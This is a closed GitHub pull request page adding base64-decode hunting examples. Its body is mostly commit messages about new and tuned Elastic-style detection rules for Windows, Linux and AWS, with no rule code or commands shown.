[new hunts] add base64 decode examples #6
Closed
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Samirbous
commented
Jun 12, 2024
Samirbous
commented
- b64 encoded powershell cmd
- b64 decode scheduled task actions via registry
elastic#3402) * Locked versions for releases: 8.3,8.4,8.5,8.6,8.7,8.8,8.9,8.10,8.11,8.12 * Update detection_rules/etc/version.lock.json --------- Co-authored-by: terrancedejesus <[email protected]> Co-authored-by: Terrance DeJesus <[email protected]>
* [New BBR] Reverse Connection through Port Knocking * Attempt to fix unit testing error * Mitre list fix? * Revert "Mitre list fix?" This reverts commit 83682b8. * Update command_and_control_linux_port_knocking_reverse_connection.toml * Update command_and_control_linux_port_knocking_reverse_connection.toml * Update rules_building_block/command_and_control_linux_port_knocking_reverse_connection.toml * Update command_and_control_linux_port_knocking_reverse_connection.toml * Update command_and_control_linux_port_knocking_reverse_connection.toml --------- Co-authored-by: Colson Wilhoit <[email protected]>
* [New Rule] Suspicious Passwd File Event Action * Description fix * Pot. UT fix * Pot. UT fix. --------- Co-authored-by: Colson Wilhoit <[email protected]>
* Update credential_access_dcsync_newterm_subjectuser.toml * Update credential_access_dcsync_replication_rights.toml
* Update command_and_control_google_drive_malicious_file_download.toml * Update command_and_control_google_drive_malicious_file_download.toml * Update command_and_control_google_drive_malicious_file_download.toml
…ic#3401) Co-authored-by: Ruben Groenewoud <[email protected]>
…#3416) * Create discovery_active_directory_webservice.toml * Update discovery_active_directory_webservice.toml * Update discovery_active_directory_webservice.toml * Update discovery_active_directory_webservice.toml * Update discovery_active_directory_webservice.toml
* [Rule Tuning] Windows BBR Tuning - 1 * . --------- Co-authored-by: Samirbous <[email protected]>
* [New Rule] Network Connection via systemd * Removed space from description * Added updated query
* [New Rule] apt Package Manager Persistence * [New Rules] APT Package Manager Persistence * [New Rules] APT Package Manager Persistence
* [New Rule] Executable Masquerading as Kernel Proc * Bumped dates * Added endgame support * Added auditd_manager support * Removed auditd_manager support for now
* [New Rules] DDExec Analysis * Increased rule scope * [New Rule] Dynamic Linker Discovery via od * Revert "[New Rule] Dynamic Linker Discovery via od" This reverts commit c58595b. * [New Rule] Dynamic Linker Discovery via od * [New Rule] Potential Memory Seeking Activity * [New BBR] Suspicious Memory grep Activity * Added endgame + auditd_manager support * Removed auditd_manager support for now * Removed auditd_manager support for now * Update discovery_suspicious_memory_grep_activity.toml --------- Co-authored-by: Samirbous <[email protected]>
* release fleet workflow updates; build package integration reference changes * updated commit hash extraction to output to env * adjusted bump-pkg-versions to only include release if necessary * fixed flake errors * add historical argument for build-release set to yes by default * Update detection_rules/devtools.py * fixed fleet workflow; updated registry data references * updated job names * removed extract commit hash job and consolidated into fleet pr job * added echo statement for current branch before checkout * removed id from extract commit hash
elastic#3431) * Locked versions for releases: 8.3,8.4,8.5,8.6,8.7,8.8,8.9,8.10,8.11,8.12 * Update detection_rules/etc/version.lock.json * updated downloadable updates file to reconcile changes * Removed spacing from downloadable updates file --------- Co-authored-by: terrancedejesus <[email protected]> Co-authored-by: Terrance DeJesus <[email protected]>
Co-authored-by: Ruben Groenewoud <[email protected]>
…ty docs (elastic#3434) * removed historical argument; added setup string; fixed links * fixing flake errors * added types for command arguments * adjusted get_release_diff to append strings for release tags * set fetch-depth to 0 for integrations checkout in workflow * changed the name of the workflow * removed TODOs * adjusted release docs workflow to remove prefix for release tags * adjusted URL replacement only if pointed to docs site * added elastic website to regex pattern * add docstrings; adjusted regex; add note for stopgap * added a note about the regex pattern for elastic URLs
* [Rule Tuning] Windows BBR Tuning - 2 * Update defense_evasion_masquerading_windows_system32_exe.toml --------- Co-authored-by: Ruben Groenewoud <[email protected]>
Co-authored-by: Samirbous <[email protected]>
Co-authored-by: Samirbous <[email protected]>
* [Rule Tuning] Windows BBR Tuning - 4 * Update discovery_system_time_discovery.toml
* [Rule Tuning] Windows BBR Tuning - 3 * Update defense_evasion_service_disabled_registry.toml --------- Co-authored-by: Samirbous <[email protected]>
* Create initial_access_execution_from_inetcache.toml * Update initial_access_execution_from_inetcache.toml
…lastic#3430) * [FR] Add Auditd_Manager to NON_DATASET_PACKAGE * Changed alphabetical order --------- Co-authored-by: Mika Ayenson <[email protected]> Co-authored-by: Terrance DeJesus <[email protected]>
* [Tuning] Linux DR Tuning - Part 2 * Update defense_evasion_binary_copied_to_suspicious_directory.toml * Update defense_evasion_base16_or_base32_encoding_or_decoding_activity.toml
* [Tuning] Linux DR Tuning - Part 1 * Update command_and_control_linux_tunneling_and_port_forwarding.toml * Update command_and_control_cat_network_activity.toml
* [New Rule] User Added to Privileged Group * add more groups * Update rules/windows/persistence_user_account_added_to_privileged_group_ad.toml Co-authored-by: Terrance DeJesus <[email protected]> * Update persistence_user_account_added_to_privileged_group_ad.toml --------- Co-authored-by: Terrance DeJesus <[email protected]>
…oup, Role(es|ql) (elastic#3735) * [New Rule] AWS IAM AdministratorAccess Policy Attached to User issue... * add source.address and source.geo.location * fix threat tactic ids * AdministratorAccess Policy Attached to Group * AdminstratoAccess Policy Attached to Role * reduce severity to medium Co-authored-by: Ruben Groenewoud <[email protected]> --------- Co-authored-by: Ruben Groenewoud <[email protected]>
* [New Rule] Executable Bit Set for rc.local/rc.common * Endgame compatibility * Update rules/linux/persistence_rc_local_common_executable_bit_set.toml
* [New Rule] Netcon through XDG Autostart Entry * Update rules/linux/persistence_xdg_autostart_netcon.toml Co-authored-by: Terrance DeJesus <[email protected]> * Update persistence_xdg_autostart_netcon.toml * Update persistence_xdg_autostart_netcon.toml --------- Co-authored-by: Terrance DeJesus <[email protected]>
…c#3759) * [New Rule] Network Connection Initiated by SSH Parent Process * Update persistence_ssh_netcon.toml * Update rules/linux/persistence_ssh_netcon.toml Co-authored-by: Samirbous <[email protected]> * Update rules/linux/persistence_ssh_netcon.toml Co-authored-by: Samirbous <[email protected]> * Update persistence_ssh_netcon.toml * Update persistence_ssh_netcon.toml --------- Co-authored-by: Samirbous <[email protected]>
* new rule 'AWS S3 Bucket Object Retrieval, Deletion, and Potential Ransom Note Replacement' * fixed technique mapping * added investigation guide; added more ransom note extensions * adjusted lookback and maxspan * added API call to second sequence * updating date * Update rules/integrations/aws/impact_s3_bucket_object_deletion_and_ransomware_note_added.toml Co-authored-by: Ruben Groenewoud <[email protected]> * Update rules/integrations/aws/impact_s3_bucket_object_deletion_and_ransomware_note_added.toml Co-authored-by: Ruben Groenewoud <[email protected]> * changed rule to ESQL; updated investigation guide * changed file name * removed txt, ecc, and note --------- Co-authored-by: Ruben Groenewoud <[email protected]>
…nce_frequency_by_top_source_ip.toml
…_frequency_by_top_source_ip.md
…nce_frequency.toml
* [Rule Tuning] Systemd-udevd Rule File Creation * Incompatible endgame field * Update rules/linux/persistence_udev_rule_creation.toml * Update rules/linux/persistence_udev_rule_creation.toml Co-authored-by: Samirbous <[email protected]> * Update rules/linux/persistence_udev_rule_creation.toml Co-authored-by: Samirbous <[email protected]> * Update persistence_udev_rule_creation.toml --------- Co-authored-by: Samirbous <[email protected]>
* [New Rules] PAM Module Creation & Unusual PAM Grantor * Update persistence_unusual_pam_grantor.toml * Update persistence_pluggable_authentication_module_creation.toml * Update rules/linux/persistence_pluggable_authentication_module_creation.toml * Update persistence_pluggable_authentication_module_creation.toml * Update persistence_unusual_pam_grantor.toml * Update rules/linux/persistence_pluggable_authentication_module_creation.toml
* [New Rule] Suspicious File Modification * Update persistence_suspicious_file_modifications.toml * Update rules/linux/persistence_suspicious_file_modifications.toml Co-authored-by: Jonhnathan <[email protected]> * Update rules/linux/persistence_suspicious_file_modifications.toml Co-authored-by: Jonhnathan <[email protected]> * Updates * Update rules/integrations/fim/persistence_suspicious_file_modifications.toml --------- Co-authored-by: Jonhnathan <[email protected]> Co-authored-by: Justin Ibarra <[email protected]>
- Scheduled tasks creation by action via registry - Suspicious Base64 Encoded Powershell Command
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.